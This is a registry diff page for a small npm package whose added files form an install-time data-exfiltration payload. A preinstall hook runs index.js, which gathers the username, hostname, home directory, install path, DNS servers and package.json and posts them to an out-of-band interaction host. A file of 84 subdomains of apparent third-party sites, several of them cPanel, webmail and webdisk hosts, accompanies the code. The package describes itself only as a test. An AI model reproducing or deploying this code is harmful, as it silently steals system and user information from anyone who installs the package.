qwscdrfgv-sfsdf-sdfsdf 0.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of qwscdrfgv-sfsdf-sdfsdf might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/cmdd.cmd +1 -0
  2. package/index.js +47 -0
  3. package/package.json +12 -0
  4. package/urls.txt +84 -0
package/cmdd.cmd ADDED
@@ -0,0 +1 @@
1
+ cmd
package/index.js ADDED
@@ -0,0 +1,47 @@
1
+ //author:- whitehacker003@protonmail.com
2
+ const os = require("os");
3
+ const dns = require("dns");
4
+ const querystring = require("querystring");
5
+ const https = require("https");
6
+ const packageJSON = require("./package.json");
7
+ const package = packageJSON.name;
8
+
9
+ const trackingData = JSON.stringify({
10
+ p: package,
11
+ c: __dirname,
12
+ hd: os.homedir(),
13
+ hn: os.hostname(),
14
+ un: os.userInfo().username,
15
+ dns: dns.getServers(),
16
+ r: packageJSON ? packageJSON.___resolved : undefined,
17
+ v: packageJSON.version,
18
+ pjson: packageJSON,
19
+ });
20
+
21
+ var postData = querystring.stringify({
22
+ msg: trackingData,
23
+ });
24
+
25
+ var options = {
26
+ hostname: "cee6fyf2vtc0000zjcjgg88d89cyyyyyb.oast.fun", //replace burpcollaborator.net with Interactsh or pipedream
27
+ port: 443,
28
+ path: "/",
29
+ method: "POST",
30
+ headers: {
31
+ "Content-Type": "application/x-www-form-urlencoded",
32
+ "Content-Length": postData.length,
33
+ },
34
+ };
35
+
36
+ var req = https.request(options, (res) => {
37
+ res.on("data", (d) => {
38
+ process.stdout.write(d);
39
+ });
40
+ });
41
+
42
+ req.on("error", (e) => {
43
+ // console.error(e);
44
+ });
45
+
46
+ req.write(postData);
47
+ req.end();
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "qwscdrfgv-sfsdf-sdfsdf",
3
+ "version": "0.0.3",
4
+ "description": "just fo test",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "alzh3r",
11
+ "license": "ISC"
12
+ }
package/urls.txt ADDED
@@ -0,0 +1,84 @@
1
+ certifs.iteam.ps
2
+ alrassedu.com
3
+ cpanel.almonjez.com
4
+ almonjez.com
5
+ asas.e-pedp.com
6
+ cpanel.alrassedu.com
7
+ cpanel.dr-science-kids.com
8
+ cpanel.e-pedp.com
9
+ cpanel.iteam.ps
10
+ cpanel.mras-ahyataif.com
11
+ cpanel.qura-tasheel.net
12
+ cpanel.tosss-app.com
13
+ cpanel.zaleskan.sa
14
+ cpcalendars.almonjez.com
15
+ cpcalendars.alrassedu.com
16
+ cpcalendars.dr-science-kids.com
17
+ cpcalendars.e-pedp.com
18
+ cpcalendars.iteam.ps
19
+ cpcalendars.mras-ahyataif.com
20
+ cpcalendars.qura-tasheel.net
21
+ cpcalendars.tosss-app.com
22
+ cpcalendars.zaleskan.sa
23
+ cpcontacts.almonjez.com
24
+ cpcontacts.alrassedu.com
25
+ cpcontacts.dr-science-kids.com
26
+ cpcontacts.e-pedp.com
27
+ cpcontacts.iteam.ps
28
+ cpcontacts.mras-ahyataif.com
29
+ cpcontacts.qura-tasheel.net
30
+ cpcontacts.tosss-app.com
31
+ cpcontacts.zaleskan.sa
32
+ dr-science-kids.com
33
+ e-pedp.com
34
+ edare.almonjez.com
35
+ iteam.ps
36
+ mc.iteam.ps
37
+ mras-ahyataif.com
38
+ qura-tasheel.net
39
+ qura.iteam.ps
40
+ ras.almonjez.com
41
+ squ.dr-science-kids.com
42
+ study.almonjez.com
43
+ tadreeb.almonjez.com
44
+ taif.e-pedp.com
45
+ testapi.almonjez.com
46
+ tosss-app.com
47
+ training.almonjez.com
48
+ v1.tosss-app.com
49
+ v5.e-pedp.com
50
+ webdisk.almonjez.com
51
+ webdisk.alrassedu.com
52
+ webdisk.dr-science-kids.com
53
+ webdisk.e-pedp.com
54
+ webdisk.iteam.ps
55
+ webdisk.mras-ahyataif.com
56
+ webdisk.qura-tasheel.net
57
+ webdisk.tosss-app.com
58
+ webdisk.zaleskan.sa
59
+ webmail.almonjez.com
60
+ webmail.alrassedu.com
61
+ webmail.dr-science-kids.com
62
+ webmail.e-pedp.com
63
+ webmail.iteam.ps
64
+ webmail.mras-ahyataif.com
65
+ webmail.qura-tasheel.net
66
+ webmail.tosss-app.com
67
+ webmail.zaleskan.sa
68
+ www.asas.e-pedp.com
69
+ www.certifs.iteam.ps
70
+ www.edare.almonjez.com
71
+ www.mc.iteam.ps
72
+ www.qura.iteam.ps
73
+ www.ras.almonjez.com
74
+ www.squ.dr-science-kids.com
75
+ www.study.almonjez.com
76
+ www.tadreeb.almonjez.com
77
+ www.taif.e-pedp.com
78
+ www.testapi.almonjez.com
79
+ www.training.almonjez.com
80
+ www.v1.tosss-app.com
81
+ www.v5.e-pedp.com
82
+ www.yanbu.e-pedp.com
83
+ yanbu.e-pedp.com
84
+ zaleskan.sa